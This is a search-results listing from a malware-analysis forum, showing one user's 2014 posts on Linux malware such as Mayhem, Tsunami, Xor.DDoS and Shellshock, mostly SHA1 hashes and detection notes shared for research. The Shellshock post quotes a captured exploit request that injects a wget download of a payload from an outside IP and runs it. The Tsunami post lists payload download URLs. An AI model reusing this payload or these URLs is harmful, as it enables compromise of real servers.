A forum for reverse engineering, OS internals and malware analysis 

Search found 45 matches

 Go to advanced search

Re: Linux/Mayhem

 by K_Mikhail ¦  Tue Nov 25, 2014 5:03 pm ¦  Forum: Malware ¦  Topic: Linux/Mayhem ¦  Replies: 26 ¦  Views: 61701

021af5de194024c0c76431ec6868534a250214e9

VT knows it from May 2014, but detection ratio is still poor.

Re: Linux/LightTaidra (mod Zendran)

 by K_Mikhail ¦  Fri Nov 07, 2014 7:17 pm ¦  Forum: Malware ¦  Topic: Linux/LightTaidra (mod Zendran) ¦  Replies: 2 ¦  Views: 4109

+ Updates.

VT: 0/34 on all files.

Re: Linux/Mayhem

 by K_Mikhail ¦  Wed Nov 05, 2014 7:33 pm ¦  Forum: Malware ¦  Topic: Linux/Mayhem ¦  Replies: 26 ¦  Views: 61701

Re: Linux/Tsunami

 by K_Mikhail ¦  Tue Oct 14, 2014 11:32 am ¦  Forum: Malware ¦  Topic: Linux/Tsunami ¦  Replies: 28 ¦  Views: 57702

_http://128.199.179.103/private/auto/xtk-ppc-auto
_http://128.199.179.103/private/auto/xtk-mips-auto
_http://128.199.179.103/private/auto/xtk-mipsel-auto
_http://128.199.179.103/private/auto/xtk-x64-auto
_http://128.199.179.103/private/auto/xtk-arm-auto

x86 is absent.

Re: Linux/Xor.DDoS

 by K_Mikhail ¦  Thu Oct 09, 2014 12:05 am ¦  Forum: Malware ¦  Topic: Linux/Xor.DDoS ¦  Replies: 33 ¦  Views: 56699

Updated ELFs. /3502 - /3505

Re: Linux/Bash0day alias Shellshock

 by K_Mikhail ¦  Thu Sep 25, 2014 1:13 pm ¦  Forum: Malware ¦  Topic: Linux/Bash0day alias Shellshock alias Bashdoor ¦  Replies: 42 ¦  Views: 129653

apache.7z From https://gist.github.com/anonymous/929d622f3b36b00c0be1 : GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh; .Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/be...

Unclassified Linux backdoor

 by K_Mikhail ¦  Fri Sep 12, 2014 7:20 pm ¦  Forum: Malware ¦  Topic: Linux/Elknot (Windows DDoS botnet, alias DnsAmp) ¦  Replies: 52 ¦  Views: 70637

Re: Linux/Mayhem

 by K_Mikhail ¦  Thu Sep 04, 2014 4:56 pm ¦  Forum: Malware ¦  Topic: Linux/Mayhem ¦  Replies: 26 ¦  Views: 61701

Here is the more actual list of Mayhem .so binaries (SHA1's): 039f55c3c44e0a10da38866cc4c920bce538410b_bruteforce.so 0759dd4602c0e7894ada36a5bbadad6c4ac9cd9c_bruteforce.so 0db15d93c71ddda6327122c49ffdb5f107e6d2b7_libworker.so 0f1c66c3bc54c45b1d492565970d51a3c83a582d_libworker.so 116b2ef01b6a0684f6da...

Re: Linux/Mayhem

 by K_Mikhail ¦  Thu Aug 28, 2014 11:10 pm ¦  Forum: Malware ¦  Topic: Linux/Mayhem ¦  Replies: 26 ¦  Views: 61701

Linux/Mayhem

 by K_Mikhail ¦  Fri Aug 01, 2014 6:09 pm ¦  Forum: Malware ¦  Topic: Linux/Mayhem ¦  Replies: 26 ¦  Views: 61701

Hello!

Looking for samples with SHA1's:

5ddebe39bdd26cf2aee202bd91d826979595784a
6992ed4a10da4f4b0eae066d07e45492f355f242
71c603c3dbf2b283ab2ee2ae1f95dcaf335b3fce
7b89f0615970d2a43b11fd7158ee36a5df93abc8

from F-Secure article - http://www.f-secure.com/weblog/archives/00002727.html

Thank you!